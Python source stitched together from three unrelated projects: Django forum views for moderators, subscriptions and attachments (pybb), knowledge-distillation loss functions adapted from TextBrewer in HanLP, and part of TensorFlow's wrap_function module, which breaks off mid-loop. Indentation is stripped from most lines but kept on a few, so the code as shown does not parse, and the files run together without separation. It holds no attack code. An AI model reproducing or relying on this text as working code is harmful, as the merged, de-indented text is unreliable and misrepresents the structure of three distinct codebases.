def get_context_data(self, **kwargs):
self.forum = self.object
return super(ModeratorCreateView, self).get_context_data(**kwargs)
def get_forms(self, form_class):
forms = [SearchUserForm(**self.get_form_kwargs()),
self.form_class(permissions=self.get_permissions(defaults.PYBB_FORUM_PERMISSIONS, Forum),
obj=self.forum,
**self.get_form_kwargs()),
self.form_class(permissions=self.get_permissions(defaults.PYBB_USER_PERMISSIONS),
**self.get_form_kwargs())]
return forms
def get_queryset(self):
return self.model.objects.all()
def form_valid(self, forms):
user_form = forms.pop(0)
user = user_form.get_user(user_form.cleaned_data['username'])
moderator = Moderator.objects.create(forum=self.forum, user=user)
for form in forms:
form.save(user)
return redirect(self.get_success_url(moderator))
def get_success_url(self, moderator):
LogModeration.objects.log(
user=self.request.user,
obj=self.forum,
action_flag=LogModeration.ACTION_FLAG_ADDITION,
target=moderator.user,
user_ip=self.request.META['REMOTE_ADDR'],
level=LogModeration.LEVEL_HIGH
)
messages.success(self.request, _('New moderator "%(username)s" created') % {
'username': moderator.user.username
})
return reverse('pybb:moderator_detail', kwargs={
'forum_id': self.forum.pk,
'moderator_id': moderator.pk
})
class ModeratorDeleteView(generic.DeleteView):
template_name = 'pybb/moderation/moderator/delete.html'
context_object_name = 'moderator'
model = Moderator
pk_url_kwarg = 'moderator_id'
@method_decorator(staff_member_required)
def dispatch(self, request, *args, **kwargs):
return super(ModeratorDeleteView, self).dispatch(request, *args, **kwargs)
def get_object(self, queryset=None):
self.forum = get_object_or_404(Forum, pk=self.kwargs['forum_id'])
moderator = get_object_or_404(self.model.objects.filter(forum=self.forum),
pk=self.kwargs[self.pk_url_kwarg])
return moderator
def get_success_url(self):
LogModeration.objects.log(
user=self.request.user,
obj=self.forum,
action_flag=LogModeration.ACTION_FLAG_DELETION,
target=self.object.user,
user_ip=self.request.META['REMOTE_ADDR'],
level=LogModeration.LEVEL_HIGH
)
return reverse('pybb:moderator_list', kwargs={
'pk': self.forum.pk
})
def get_context_data(self, **kwargs):
return dict(super(ModeratorDeleteView, self).get_context_data(**kwargs), **{
'forum': self.forum
})
class SubscriptionChangeView(generic.RedirectView):
http_method_names = ['post']
permanent = False
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
return super(SubscriptionChangeView, self).dispatch(request, *args, **kwargs)
def get_redirect_url(self, **kwargs):
if 'topic_ids' not in self.request.POST or 'type' not in self.request.POST:
raise Http404
try:
type = int(self.request.POST['type'])
except ValueError:
raise Http404
types = dict(Subscription.TYPE_CHOICES)
if type not in types:
raise Http404
topic_ids = self.request.POST.getlist('topic_ids')
subscriptions = (Subscription.objects.filter(topic__in=topic_ids,
user=self.request.user)
.exclude(type=type)
.select_related('topic'))
subscriptions.update(type=type)
        messages.success(self.request, _('Your subscriptions have been updated: %(type)s') % {
'type': types[type]
})
return reverse('pybb:subscription_list')
class SubscriptionDeleteView(generic.RedirectView):
http_method_names = ['post']
permanent = False
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
return super(SubscriptionDeleteView, self).dispatch(request, *args, **kwargs)
def get_redirect_url(self, **kwargs):
if 'topic_ids' not in self.request.POST and 'topic_id' not in self.request.POST:
raise Http404
topic = None
if 'topic_ids' in self.request.POST:
topic_ids = self.request.POST.getlist('topic_ids')
else:
topic_id = self.request.POST.get('topic_id')
topic_ids = [topic_id, ]
topic = get_object_or_404(Topic, pk=topic_id)
Subscription.objects.filter(topic__in=topic_ids, user=self.request.user).delete()
if not topic:
            messages.success(self.request, _('Your subscriptions have been deleted'))
return reverse('pybb:subscription_list')
messages.success(self.request, _('Your subscription to %(topic)s has been deleted') % {
'topic': topic
})
return topic.get_absolute_url()
class SubscriptionListView(ListView):
template_name = 'pybb/user/subscription_list.html'
context_object_name = 'subscription_list'
model = Subscription
paginate_by = defaults.PYBB_FORUM_PAGE_SIZE
paginator_class = Paginator
allow_empty_page = True
prefetch_fields = ('topic__user', 'topic__last_post', 'topic__last_post__user')
prefetch_profiles = ('topic__user', 'topic__last_post__user')
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
return super(SubscriptionListView, self).dispatch(request, *args, **kwargs)
def get_context_data(self, **kwargs):
context = super(SubscriptionListView, self).get_context_data(**kwargs)
context['topic_list'] = [subscription.topic for subscription in context[self.context_object_name]]
context['subscription_types'] = Subscription.TYPE_CHOICES
return context
def get_queryset(self):
qs = (self.model.objects.order_by('-topic__updated')
.filter(user=self.request.user)
.select_related('topic__forum')
.visible())
return qs
@require_http_methods(['POST'])
@login_required
def create_subscription(request):
try:
topic_id = request.POST.get('topic_id', None)
        type = int(request.POST.get('type', Subscription.TYPE_NO_ALERT))
if not topic_id:
raise PermissionDenied
topic_id = int(topic_id)
except ValueError:
raise PermissionDenied
topic = get_object_or_404(Topic, pk=topic_id)
subscription, created = Subscription.objects.get_or_create(user=request.user,
topic=topic)
subscription.type = type
subscription.save()
if created:
messages.success(request, _('Your subscription to %(topic)s has been created: %(type)s') % {
'topic': topic,
'type': subscription.get_type_display()
})
else:
messages.success(request, _('Your subscription to %(topic)s has been updated: %(type)s') % {
'topic': topic,
'type': subscription.get_type_display()
})
return redirect(topic.get_absolute_url())
@require_http_methods(['POST'])
@login_required
def post_preview(request, template_name='pybb/post/template.html'):
content = request.POST.get('data')
post = Post(body=content, user=request.user)
post.body_html = markup(content, obj=post)
post.created = datetime.now()
return render(request, template_name, {
'post': post
})
class ForumMarkAsReadView(generic.View):
model = ForumReadTracker
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
return super(ForumMarkAsReadView, self).dispatch(request, *args, **kwargs)
def get(self, request, *args, **kwargs):
self.model.objects.mark_as_read(request.user, filter_hidden(request, Forum))
TopicReadTracker.objects.filter(user=request.user).delete()
Subscription.objects.filter(user=request.user).update(sent=False)
messages.success(request, _('All forums marked as read'), fail_silently=True)
return redirect(reverse('pybb:index'))
def post(self, request, *args, **kwargs):
        try:
            forum_id = int(request.POST.get('forum_id', None))
        except (TypeError, ValueError):
            raise PermissionDenied
else:
parent_forum = get_object_or_404(filter_hidden(request, Forum), pk=forum_id)
forums = [parent_forum, ] + list(Forum.objects.children(parent_forum))
self.model.objects.mark_as_read(request.user, forums)
for forum in forums:
TopicReadTracker.objects.filter(user=request.user, topic__forum=forum).delete()
Subscription.objects.filter(user=request.user, topic__forum=forum).update(sent=False)
messages.success(request, _('Forum %s has been marked as read') % parent_forum, fail_silently=True)
return redirect(parent_forum.get_absolute_url())
class AttachmentDeleteView(generic.DeleteView):
template_name = 'pybb/attachment/delete.html'
context_object_name = 'attachment'
model = Attachment
def get_object(self, queryset=None):
attachment = get_object_or_404(self.model,
pk=self.kwargs['pk'])
if attachment.post_id:
if not attachment.post.is_editable_by(self.request.user, 'can_change_attachment'):
raise PermissionDenied
else:
if not attachment.user == self.request.user:
raise PermissionDenied
return attachment
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
return super(AttachmentDeleteView, self).dispatch(request, *args, **kwargs)
def get_queryset(self):
return self.model.objects.filter(user=self.request.user)
def delete(self, request, *args, **kwargs):
self.object = self.get_object()
self.object.delete()
if not self.request.is_ajax():
return redirect(self.get_success_url())
return HttpResponse('Ok')
def get_success_url(self):
if self.object.post_id:
return self.object.post.get_absolute_url()
return reverse('pybb:index')
class AttachmentListView(TemplateResponseMixin, generic.View):
template_name = 'pybb/attachment/list.html'
form_class = AttachmentFormSet
http_method_names = ['post']
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
return super(AttachmentListView, self).dispatch(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
self.request = request
ctx = {}
        try:
            post_hash = self.request.POST['post_hash']
        except KeyError:
            raise Http404
ctx['post_hash'] = post_hash
try:
self.object = Post.objects.get(hash=post_hash)
except Post.DoesNotExist:
self.object = None
else:
if not self.object.is_editable_by(request.user, 'can_change_attachment'):
raise Http404
if 'submit' in self.request.POST:
aformset = self.form_class(self.request.POST, self.request.FILES)
if aformset.is_valid():
instances = aformset.save(commit=False)
for instance in instances:
instance.post_hash = post_hash
if self.object:
instance.post = self.object
else:
instance.post = None
instance.user = self.request.user
instance.save()
aformset = self.form_class()
else:
aformset = self.form_class()
ctx['aformset'] = aformset
if self.object:
ctx['attachments'] = self.object.attachments.all()
else:
ctx['attachments'] = Attachment.objects.filter(post_hash=post_hash)
return self.render_to_response(ctx)
# Adopted from https://github.com/airaria/TextBrewer
# Apache License Version 2.0
import torch
import torch.nn.functional as F
from hanlp_common.configurable import AutoConfigurable
def kd_mse_loss(logits_S, logits_T, temperature=1):
'''
Calculate the mse loss between logits_S and logits_T
:param logits_S: Tensor of shape (batch_size, length, num_labels) or (batch_size, num_labels)
:param logits_T: Tensor of shape (batch_size, length, num_labels) or (batch_size, num_labels)
:param temperature: A float or a tensor of shape (batch_size, length) or (batch_size,)
'''
if isinstance(temperature, torch.Tensor) and temperature.dim() > 0:
temperature = temperature.unsqueeze(-1)
beta_logits_T = logits_T / temperature
beta_logits_S = logits_S / temperature
loss = F.mse_loss(beta_logits_S, beta_logits_T)
return loss
def kd_ce_loss(logits_S, logits_T, temperature=1):
'''
Calculate the cross entropy between logits_S and logits_T
:param logits_S: Tensor of shape (batch_size, length, num_labels) or (batch_size, num_labels)
:param logits_T: Tensor of shape (batch_size, length, num_labels) or (batch_size, num_labels)
:param temperature: A float or a tensor of shape (batch_size, length) or (batch_size,)
'''
if isinstance(temperature, torch.Tensor) and temperature.dim() > 0:
temperature = temperature.unsqueeze(-1)
beta_logits_T = logits_T / temperature
beta_logits_S = logits_S / temperature
p_T = F.softmax(beta_logits_T, dim=-1)
loss = -(p_T * F.log_softmax(beta_logits_S, dim=-1)).sum(dim=-1).mean()
return loss
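def _demo_kd_logit_losses():
    '''A minimal, illustrative sketch (not part of the original TextBrewer
    API): shows the expected logit shapes and the effect of the temperature.
    All names and values below are hypothetical.'''
    logits_T = torch.tensor([[2.0, 0.5, -1.0]])  # teacher logits (batch, labels)
    logits_S = torch.tensor([[1.0, 0.8, -0.5]])  # student logits (batch, labels)
    mse = kd_mse_loss(logits_S, logits_T, temperature=1)
    # A higher temperature flattens p_T, softening the targets the student
    # is matched against.
    ce_soft = kd_ce_loss(logits_S, logits_T, temperature=4)
    return mse, ce_soft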
def att_mse_loss(attention_S, attention_T, mask=None):
'''
    * Calculates the mse loss between `attention_S` and `attention_T`.
    * If the `mask` is given, masks the positions where ``mask==0``.
    :param torch.Tensor attention_S: tensor of shape (*batch_size*, *num_heads*, *length*, *length*)
    :param torch.Tensor attention_T: tensor of shape (*batch_size*, *num_heads*, *length*, *length*)
    :param torch.Tensor mask: tensor of shape (*batch_size*, *length*)
'''
if mask is None:
attention_S_select = torch.where(attention_S <= -1e-3, torch.zeros_like(attention_S), attention_S)
attention_T_select = torch.where(attention_T <= -1e-3, torch.zeros_like(attention_T), attention_T)
loss = F.mse_loss(attention_S_select, attention_T_select)
else:
mask = mask.to(attention_S).unsqueeze(1).expand(-1, attention_S.size(1), -1) # (bs, num_of_heads, len)
valid_count = torch.pow(mask.sum(dim=2), 2).sum()
loss = (F.mse_loss(attention_S, attention_T, reduction='none') * mask.unsqueeze(-1) * mask.unsqueeze(
2)).sum() / valid_count
return loss
def att_mse_sum_loss(attention_S, attention_T, mask=None):
'''
    * Calculates the mse loss between `attention_S` and `attention_T`.
    * If the shape is (*batch_size*, *num_heads*, *length*, *length*), sums along the `num_heads` dimension and then calculates the mse loss between the two matrices.
    * If the `mask` is given, masks the positions where ``mask==0``.
    :param torch.Tensor attention_S: tensor of shape (*batch_size*, *num_heads*, *length*, *length*) or (*batch_size*, *length*, *length*)
    :param torch.Tensor attention_T: tensor of shape (*batch_size*, *num_heads*, *length*, *length*) or (*batch_size*, *length*, *length*)
    :param torch.Tensor mask: tensor of shape (*batch_size*, *length*)
'''
if len(attention_S.size()) == 4:
attention_T = attention_T.sum(dim=1)
attention_S = attention_S.sum(dim=1)
if mask is None:
attention_S_select = torch.where(attention_S <= -1e-3, torch.zeros_like(attention_S), attention_S)
attention_T_select = torch.where(attention_T <= -1e-3, torch.zeros_like(attention_T), attention_T)
loss = F.mse_loss(attention_S_select, attention_T_select)
else:
mask = mask.to(attention_S)
valid_count = torch.pow(mask.sum(dim=1), 2).sum()
loss = (F.mse_loss(attention_S, attention_T, reduction='none') * mask.unsqueeze(-1) * mask.unsqueeze(
1)).sum() / valid_count
return loss
def att_ce_loss(attention_S, attention_T, mask=None):
'''
    * Calculates the cross-entropy loss between `attention_S` and `attention_T`, where softmax is applied along ``dim=-1``.
    * If the `mask` is given, masks the positions where ``mask==0``.
    :param torch.Tensor attention_S: tensor of shape (*batch_size*, *num_heads*, *length*, *length*)
    :param torch.Tensor attention_T: tensor of shape (*batch_size*, *num_heads*, *length*, *length*)
    :param torch.Tensor mask: tensor of shape (*batch_size*, *length*)
'''
probs_T = F.softmax(attention_T, dim=-1)
if mask is None:
probs_T_select = torch.where(attention_T <= -1e-3, torch.zeros_like(attention_T), probs_T)
loss = -((probs_T_select * F.log_softmax(attention_S, dim=-1)).sum(dim=-1)).mean()
else:
mask = mask.to(attention_S).unsqueeze(1).expand(-1, attention_S.size(1), -1) # (bs, num_of_heads, len)
loss = -((probs_T * F.log_softmax(attention_S, dim=-1) * mask.unsqueeze(2)).sum(
dim=-1) * mask).sum() / mask.sum()
return loss
def att_ce_mean_loss(attention_S, attention_T, mask=None):
'''
    * Calculates the cross-entropy loss between `attention_S` and `attention_T`, where softmax is applied along ``dim=-1``.
    * If the shape is (*batch_size*, *num_heads*, *length*, *length*), averages over the `num_heads` dimension and then computes the cross-entropy loss between the two matrices.
    * If the `mask` is given, masks the positions where ``mask==0``.
    :param torch.Tensor attention_S: tensor of shape (*batch_size*, *num_heads*, *length*, *length*) or (*batch_size*, *length*, *length*)
    :param torch.Tensor attention_T: tensor of shape (*batch_size*, *num_heads*, *length*, *length*) or (*batch_size*, *length*, *length*)
    :param torch.Tensor mask: tensor of shape (*batch_size*, *length*)
'''
if len(attention_S.size()) == 4:
attention_S = attention_S.mean(dim=1) # (bs, len, len)
attention_T = attention_T.mean(dim=1)
probs_T = F.softmax(attention_T, dim=-1)
if mask is None:
probs_T_select = torch.where(attention_T <= -1e-3, torch.zeros_like(attention_T), probs_T)
loss = -((probs_T_select * F.log_softmax(attention_S, dim=-1)).sum(dim=-1)).mean()
else:
mask = mask.to(attention_S)
loss = -((probs_T * F.log_softmax(attention_S, dim=-1) * mask.unsqueeze(1)).sum(
dim=-1) * mask).sum() / mask.sum()
return loss
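def _demo_attention_losses():
    '''Illustrative sketch with hypothetical shapes: random attention maps for
    a padded batch, compared with the masked attention losses above.'''
    bs, heads, length = 2, 4, 5
    attention_T = torch.rand(bs, heads, length, length)
    attention_S = torch.rand(bs, heads, length, length)
    mask = torch.tensor([[1, 1, 1, 1, 0],
                         [1, 1, 1, 0, 0]])  # 0 marks padded positions
    return (att_mse_loss(attention_S, attention_T, mask),
            att_ce_loss(attention_S, attention_T, mask))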
def hid_mse_loss(state_S, state_T, mask=None):
'''
    * Calculates the mse loss between `state_S` and `state_T`, which are the hidden states of the models.
    * If the `mask` is given, masks the positions where ``mask==0``.
    * If the hidden sizes of student and teacher are different, the 'proj' option is required in `intermediate_matches` to match the dimensions.
    :param torch.Tensor state_S: tensor of shape (*batch_size*, *length*, *hidden_size*)
    :param torch.Tensor state_T: tensor of shape (*batch_size*, *length*, *hidden_size*)
    :param torch.Tensor mask: tensor of shape (*batch_size*, *length*)
'''
if mask is None:
loss = F.mse_loss(state_S, state_T)
else:
mask = mask.to(state_S)
valid_count = mask.sum() * state_S.size(-1)
loss = (F.mse_loss(state_S, state_T, reduction='none') * mask.unsqueeze(-1)).sum() / valid_count
return loss
def cos_loss(state_S, state_T, mask=None):
'''
    * Computes the cosine similarity loss between the inputs. This is the loss used in DistilBERT, see `DistilBERT <https://arxiv.org/abs/1910.01108>`_
    * If the `mask` is given, masks the positions where ``mask==0``.
    * If the hidden sizes of student and teacher are different, the 'proj' option is required in `intermediate_matches` to match the dimensions.
    :param torch.Tensor state_S: tensor of shape (*batch_size*, *length*, *hidden_size*)
    :param torch.Tensor state_T: tensor of shape (*batch_size*, *length*, *hidden_size*)
    :param torch.Tensor mask: tensor of shape (*batch_size*, *length*)
'''
if mask is None:
state_S = state_S.view(-1, state_S.size(-1))
state_T = state_T.view(-1, state_T.size(-1))
else:
        # masked_select requires a boolean mask (a float mask raises on
        # recent PyTorch versions), so convert after expanding.
        mask = mask.unsqueeze(-1).expand_as(state_S).to(device=state_S.device, dtype=torch.bool)  # (bs, len, dim)
        state_S = torch.masked_select(state_S, mask).view(-1, state_S.size(-1))  # (bs * select, dim)
        state_T = torch.masked_select(state_T, mask).view(-1, state_T.size(-1))  # (bs * select, dim)
target = state_S.new(state_S.size(0)).fill_(1)
loss = F.cosine_embedding_loss(state_S, state_T, target, reduction='mean')
return loss
def pkd_loss(state_S, state_T, mask=None):
'''
    * Computes the normalized vector mse loss at position 0 along the `length` dimension. This is the loss used in BERT-PKD, see `Patient Knowledge Distillation for BERT Model Compression <https://arxiv.org/abs/1908.09355>`_.
    * If the hidden sizes of student and teacher are different, the 'proj' option is required in `intermediate_matches` to match the dimensions.
    :param torch.Tensor state_S: tensor of shape (*batch_size*, *length*, *hidden_size*)
    :param torch.Tensor state_T: tensor of shape (*batch_size*, *length*, *hidden_size*)
    :param mask: not used.
'''
cls_T = state_T[:, 0] # (batch_size, hidden_dim)
cls_S = state_S[:, 0] # (batch_size, hidden_dim)
normed_cls_T = cls_T / torch.norm(cls_T, dim=1, keepdim=True)
normed_cls_S = cls_S / torch.norm(cls_S, dim=1, keepdim=True)
loss = (normed_cls_S - normed_cls_T).pow(2).sum(dim=-1).mean()
return loss
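def _demo_pkd_loss():
    '''Illustrative sketch with hypothetical shapes: PKD only compares the
    normalized vectors at position 0, so the student may have a different
    sequence length than the teacher, but the hidden sizes must match.'''
    state_T = torch.rand(2, 7, 8)  # teacher hidden states
    state_S = torch.rand(2, 5, 8)  # student hidden states, shorter sequence
    return pkd_loss(state_S, state_T)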
def fsp_loss(state_S, state_T, mask=None):
r'''
    * Takes in two lists of matrices `state_S` and `state_T`. Each list contains two matrices of the shape (*batch_size*, *length*, *hidden_size*). Computes the similarity matrix between the two matrices in `state_S` (with the resulting shape (*batch_size*, *hidden_size*, *hidden_size*)) and the one between the two matrices in `state_T` (with the same resulting shape), then computes the mse loss between the similarity matrices:
    .. math::
        loss = mean((S_{1}^T \cdot S_{2} - T_{1}^T \cdot T_{2})^2)
    * It is a variant of the FSP loss in `A Gift from Knowledge Distillation: Fast Optimization, Network Minimization and Transfer Learning <http://openaccess.thecvf.com/content_cvpr_2017/papers/Yim_A_Gift_From_CVPR_2017_paper.pdf>`_.
    * If the `mask` is given, masks the positions where ``mask==0``.
    * If the hidden sizes of student and teacher are different, the 'proj' option is required in `intermediate_matches` to match the dimensions.
    :param torch.Tensor state_S: list of two tensors, each of the shape (*batch_size*, *length*, *hidden_size*)
    :param torch.Tensor state_T: list of two tensors, each of the shape (*batch_size*, *length*, *hidden_size*)
    :param torch.Tensor mask: tensor of the shape (*batch_size*, *length*)
Example in `intermediate_matches`::
intermediate_matches = [
{'layer_T':[0,0], 'layer_S':[0,0], 'feature':'hidden','loss': 'fsp', 'weight' : 1, 'proj':['linear',384,768]},
...]
'''
if mask is None:
state_S_0 = state_S[0] # (batch_size , length, hidden_dim)
state_S_1 = state_S[1] # (batch_size, length, hidden_dim)
state_T_0 = state_T[0]
state_T_1 = state_T[1]
gram_S = torch.bmm(state_S_0.transpose(1, 2), state_S_1) / state_S_1.size(
1) # (batch_size, hidden_dim, hidden_dim)
gram_T = torch.bmm(state_T_0.transpose(1, 2), state_T_1) / state_T_1.size(1)
else:
mask = mask.to(state_S[0]).unsqueeze(-1)
lengths = mask.sum(dim=1, keepdim=True)
state_S_0 = state_S[0] * mask
state_S_1 = state_S[1] * mask
state_T_0 = state_T[0] * mask
state_T_1 = state_T[1] * mask
gram_S = torch.bmm(state_S_0.transpose(1, 2), state_S_1) / lengths
gram_T = torch.bmm(state_T_0.transpose(1, 2), state_T_1) / lengths
loss = F.mse_loss(gram_S, gram_T)
return loss
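def _demo_fsp_loss():
    '''Illustrative sketch with hypothetical shapes: FSP consumes a *pair* of
    hidden states per model and compares their Gram matrices, so the student
    and teacher Gram matrices must end up with the same hidden size (via the
    'proj' option when the raw sizes differ).'''
    bs, length, dim = 2, 6, 8
    state_S = [torch.rand(bs, length, dim), torch.rand(bs, length, dim)]
    state_T = [torch.rand(bs, length, dim), torch.rand(bs, length, dim)]
    mask = torch.ones(bs, length)
    return fsp_loss(state_S, state_T, mask)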
def mmd_loss(state_S, state_T, mask=None):
r'''
    * Takes in two lists of matrices `state_S` and `state_T`. Each list contains two matrices of the shape (*batch_size*, *length*, *hidden_size*). The `hidden_size` of the matrices in `state_S` does not need to match that of `state_T`. Computes the similarity matrix between the two matrices in `state_S` (with the resulting shape (*batch_size*, *length*, *length*)) and the one between the two matrices in `state_T` (with the same resulting shape), then computes the mse loss between the similarity matrices:
    .. math::
        loss = mean((S_{1} \cdot S_{2}^T - T_{1} \cdot T_{2}^T)^2)
    * It is a variant of the NST loss in `Like What You Like: Knowledge Distill via Neuron Selectivity Transfer <https://arxiv.org/abs/1707.01219>`_.
    * If the `mask` is given, masks the positions where ``mask==0``.
    :param torch.Tensor state_S: list of two tensors, each of the shape (*batch_size*, *length*, *hidden_size*)
    :param torch.Tensor state_T: list of two tensors, each of the shape (*batch_size*, *length*, *hidden_size*)
    :param torch.Tensor mask: tensor of the shape (*batch_size*, *length*)
Example in `intermediate_matches`::
intermediate_matches = [
{'layer_T':[0,0], 'layer_S':[0,0], 'feature':'hidden','loss': 'nst', 'weight' : 1},
...]
'''
state_S_0 = state_S[0] # (batch_size , length, hidden_dim_S)
state_S_1 = state_S[1] # (batch_size , length, hidden_dim_S)
state_T_0 = state_T[0] # (batch_size , length, hidden_dim_T)
state_T_1 = state_T[1] # (batch_size , length, hidden_dim_T)
if mask is None:
gram_S = torch.bmm(state_S_0, state_S_1.transpose(1, 2)) / state_S_1.size(2) # (batch_size, length, length)
gram_T = torch.bmm(state_T_0, state_T_1.transpose(1, 2)) / state_T_1.size(2)
loss = F.mse_loss(gram_S, gram_T)
else:
mask = mask.to(state_S[0])
valid_count = torch.pow(mask.sum(dim=1), 2).sum()
gram_S = torch.bmm(state_S_0, state_S_1.transpose(1, 2)) / state_S_1.size(1) # (batch_size, length, length)
gram_T = torch.bmm(state_T_0, state_T_1.transpose(1, 2)) / state_T_1.size(1)
loss = (F.mse_loss(gram_S, gram_T, reduction='none') * mask.unsqueeze(-1) * mask.unsqueeze(
1)).sum() / valid_count
return loss
class KnowledgeDistillationLoss(AutoConfigurable):
def __init__(self, name) -> None:
super().__init__()
self.name = name
import sys
thismodule = sys.modules[__name__]
self._loss = getattr(thismodule, name)
def __call__(self, *args, **kwargs):
return self._loss(*args, **kwargs)
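def _demo_kd_loss_by_name():
    '''Illustrative sketch: KnowledgeDistillationLoss looks a loss function up
    in this module by name, so configuration files can refer to losses as
    plain strings. The tensors below are hypothetical.'''
    criterion = KnowledgeDistillationLoss('kd_ce_loss')
    logits_T = torch.rand(2, 3)
    logits_S = torch.rand(2, 3)
    return criterion(logits_S, logits_T, temperature=2)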
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=unidiomatic-typecheck
"""Prototype decorator for defining legacy-graph-mode functions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import weakref
from tensorflow.core.protobuf import meta_graph_pb2
from tensorflow.core.protobuf import struct_pb2
from tensorflow.python.eager import context
from tensorflow.python.eager import function
from tensorflow.python.eager import lift_to_graph
from tensorflow.python.framework import composite_tensor
from tensorflow.python.framework import func_graph
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import nested_structure_coder
from tensorflow.python.training.tracking import data_structures
from tensorflow.python.util import nest
from tensorflow.python.util.tf_export import tf_export
class VariableHolder(object):
"""Holds variables for a python function."""
def __init__(self, fn=None, share_variables=False):
self._fn = fn
self._share_variables = share_variables
self._variables_by_name = data_structures.Mapping()
@property
def variables(self):
return self._variables_by_name
def variable_creator_scope(self, next_creator, **kwargs):
"""Creates variables & adds them to collections to match legacy code."""
collections = kwargs.pop("collections", None)
v = None
# Get expected variable name.
with ops.name_scope(kwargs.get("name", None), "Variable") as name:
variable_name = ops.name_from_scope_name(name)
kwargs["name"] = name
if self._share_variables:
v = self._variables_by_name.get(variable_name, None)
if v is None:
v = next_creator(**kwargs)
self._variables_by_name[variable_name] = v
if collections is None:
collections = [ops.GraphKeys.GLOBAL_VARIABLES]
if v.trainable and ops.GraphKeys.TRAINABLE_VARIABLES not in collections:
collections = list(collections) + [ops.GraphKeys.TRAINABLE_VARIABLES]
ops.add_to_collections(collections, v)
return v
def __call__(self, *args, **kwargs):
return self.call_with_variable_creator_scope(self._fn)(*args, **kwargs)
def call_with_variable_creator_scope(self, fn):
def wrapped(*args, **kwargs):
with variable_scope.variable_creator_scope(self.variable_creator_scope):
return fn(*args, **kwargs)
return wrapped
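def _demo_variable_holder():
  """Illustrative sketch, not part of this module's API: running a legacy
  graph-building function under a VariableHolder records the variables it
  creates; with share_variables=True, later calls reuse them by name."""
  def build():
    return variable_scope.get_variable("demo_v", shape=[2])
  holder = VariableHolder(build, share_variables=True)
  with ops.Graph().as_default():
    holder()  # creates "demo_v" and records it in holder.variables
  return holder.variables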
def _get_element_from_tensor_info(tensor_info, graph):
"""Simplified copy of the deprecated `get_tensor_from_tensor_info`."""
encoding = tensor_info.WhichOneof("encoding")
if encoding == "name":
# We may get operations here in some cases. TensorInfo is a bit of a
# misnomer if so.
return graph.as_graph_element(tensor_info.name)
elif encoding == "coo_sparse":
return sparse_tensor.SparseTensor(
graph.get_tensor_by_name(tensor_info.coo_sparse.indices_tensor_name),
graph.get_tensor_by_name(tensor_info.coo_sparse.values_tensor_name),
graph.get_tensor_by_name(
tensor_info.coo_sparse.dense_shape_tensor_name))
elif encoding == "composite_tensor":
struct_coder = nested_structure_coder.StructureCoder()
spec_proto = struct_pb2.StructuredValue(
type_spec_value=tensor_info.composite_tensor.type_spec)
spec = struct_coder.decode_proto(spec_proto)
components = [graph.get_tensor_by_name(component.name) for component in
tensor_info.composite_tensor.components]
return spec._from_components(components) # pylint: disable=protected-access
else:
raise ValueError("Invalid TensorInfo.encoding: %s" % encoding)
def _lift_single_variable(old_variable, graph, variable_holder):
"""Lifts `old_variable` out of the `FuncGraph` `graph`."""
new_variable = resource_variable_ops.UninitializedVariable(
shape=old_variable.shape,
dtype=old_variable.dtype,
name=old_variable.op.name,
trainable=old_variable.trainable,
extra_handle_data=old_variable.handle)
new_variable._initializer_op = old_variable._initializer_op # pylint: disable=protected-access
graph.add_capture(new_variable.handle, old_variable.handle)
# Now that we've added the new variable to graph.captures,
# graph.capture will use that cached value and do some post-processing
# on the capture like recording it on the tape.
graph.capture(new_variable.handle)
# pylint: disable=protected-access
variable_name = new_variable.name.split(":")[0]
variable_holder._variables_by_name[variable_name] = new_variable
graph._weak_variables.append(weakref.ref(new_variable))
# pylint: enable=protected-access
graph.watch_variable(new_variable)
return new_variable
def _lift_unlifted_variables(graph, variable_holder):
"""Finds resource variables and lifts them into the outer context.
When we import a GraphDef inside a wrap_function, no Python graph building
code runs. This means we get VarHandleOps which create variable resources,
but no corresponding Python objects. Leaving them like this works but gives
the user no way to interact with or modify the variables outside the graph.
This method searches for variables and lifts them out as regular variable
objects when possible, indicating to the FuncGraph that they are captures.
Args:
graph: The FuncGraph to lift variables from.
variable_holder: A VariableHolder to record the lifted variables in.
"""
with graph.as_default():
global_collection_variables = ops.get_collection(
ops.GraphKeys.GLOBAL_VARIABLES)
local_collection_variables = ops.get_collection(
ops.GraphKeys.LOCAL_VARIABLES)
existing_captures = {id(c) for c in graph.internal_captures}
lifted_variables = {}
def _should_lift_variable(v):
return ((v._in_graph_mode # pylint: disable=protected-access
and v.graph.building_function)
and isinstance(v, resource_variable_ops.BaseResourceVariable)
and id(v.handle) not in existing_captures)
for old_variable in global_collection_variables:
if _should_lift_variable(old_variable):
new_variable = _lift_single_variable(
old_variable, graph, variable_holder)
lifted_variables[id(old_variable)] = new_variable
existing_captures.add(id(old_variable.handle))
for old_variable in local_collection_variables:
if _should_lift_variable(old_variable):
new_variable = _lift_single_variable(
old_variable, graph, variable_holder)
lifted_variables[id(old_variable)] = new_variable
existing_captures.add(id(old_variable.handle))
if new_variable._in_graph_mode: # pylint: disable=protected-access
outer_graph = new_variable.graph
# Variables are added to the global collection by default. In this
# case we only want the variable in the local collection, so we'll pop
# it out.
global_collection = outer_graph.get_collection_ref(
ops.GraphKeys.GLOBAL_VARIABLES)
global_collection.remove(new_variable)
outer_graph.add_to_collection(
ops.GraphKeys.LOCAL_VARIABLES, new_variable)
# Update the FuncGraph's collections, partly for the user and partly so this
# function is idempotent when it runs again in prune() calls.
for collection_name in [
ops.GraphKeys.GLOBAL_VARIABLES, ops.GraphKeys.LOCAL_VARIABLES
]:
